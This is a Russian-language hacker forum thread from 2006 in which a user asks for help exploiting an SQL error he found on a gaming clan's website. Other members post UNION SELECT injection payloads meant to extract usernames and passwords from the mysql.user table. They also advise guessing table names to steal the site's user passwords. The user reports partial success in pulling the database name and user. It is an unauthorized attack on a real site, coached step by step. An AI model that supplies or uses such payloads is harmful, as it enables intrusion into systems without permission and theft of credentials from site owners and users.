HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ОФФТОП > Болталка
Перезагрузить страницу дЫРА ли это?
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

дЫРА ли это?
  #1  
Старый 03.06.2006, 12:11
temon
Участник форума
Регистрация: 06.02.2005
Сообщений: 130
С нами: 11187283

Репутация: 5
По умолчанию дЫРА ли это?
пРИВЕТ всем.
Тут на сайте одного из кланов БК нашел вот что.
Если сделать запрос на статью:
newsid='
то вылазит:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/xxx/public_html/modules/comments/comments.php on line 72

sql-injection можно провести с помошью этого?
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось temon; 03.06.2006 в 12:27..
 
Ответить с цитированием

  #2  
Старый 03.06.2006, 12:14
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
С нами: 11200586

Репутация: 1398


По умолчанию
Хм а что ты нас то спрашиваешь. Ты сам не пробовал. Попробуй провести такой запрос
Код:
+union+select+1,2,user,password,5,6+from+mysql.user/*
Если скажет acces denied то 100% скуль. Вот тебе статьи если что по скулям.
http://www.forum.antichat.ru/thread19684.html
http://www.forum.antichat.ru/thread19605.html
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #3  
Старый 03.06.2006, 12:28
temon
Участник форума
Регистрация: 06.02.2005
Сообщений: 130
С нами: 11187283

Репутация: 5
По умолчанию
спасибо. проверю
 
Ответить с цитированием

  #4  
Старый 03.06.2006, 12:58
temon
Участник форума
Регистрация: 06.02.2005
Сообщений: 130
С нами: 11187283

Репутация: 5
По умолчанию
ура!!!
сделал запрос:
-1+union+select+1,2,3,4,5/*
прокатило все.
а как дальше строить запрос. помогите пожалуйста.
да вот вытянул название бд и юзера.
но не получаетсяс помошью этого:
-1+union+select+1,2,user,password,5+from+mysql.us er/*
вытянусть пасс
Последний раз редактировалось temon; 03.06.2006 в 13:10..
 
Ответить с цитированием

  #5  
Старый 04.06.2006, 07:27
temon
Участник форума
Регистрация: 06.02.2005
Сообщений: 130
С нами: 11187283

Репутация: 5
По умолчанию
мне кто нить поможет в конце концов?
 
Ответить с цитированием

  #6  
Старый 04.06.2006, 09:36
K[o]S
Новичок
Регистрация: 29.07.2005
Сообщений: 20
С нами: 10938305

Репутация: 13
По умолчанию
Нет прав на доступ к базе mysql .
 
Ответить с цитированием

  #7  
Старый 04.06.2006, 10:38
Utochka
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
С нами: 10729766

Репутация: 268


По умолчанию
подбирай названия таблиц и столбцов, чтобы спереть пассы юзверей.

Об sql можешь почитать тут ->->-> http://xzone.org.ru/index.php?name=Pages&op=page&pid=56
Последний раз редактировалось NeX; 04.06.2006 в 10:40..
 
Ответить с цитированием

  #8  
Старый 04.06.2006, 10:58
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
С нами: 11200586

Репутация: 1398


По умолчанию
-1+union+select+1,2,user,password,5+from+mysql.user/*
Пропиши и дай лог что выдала страница.
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #9  
Старый 04.06.2006, 20:12
temon
Участник форума
Регистрация: 06.02.2005
Сообщений: 130
С нами: 11187283

Репутация: 5
По умолчанию
ничего не выдала.
точнее то что и при простом ошибочном запросе.
даже столбцов нету
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/xxx/public_html/modules/comments/comments.php on line 72
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Привет от Tclover'a Elekt Болталка 13 02.03.2009 21:15
Открытое письмо журналу "Хакер" TheFile Болталка 34 31.01.2009 21:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.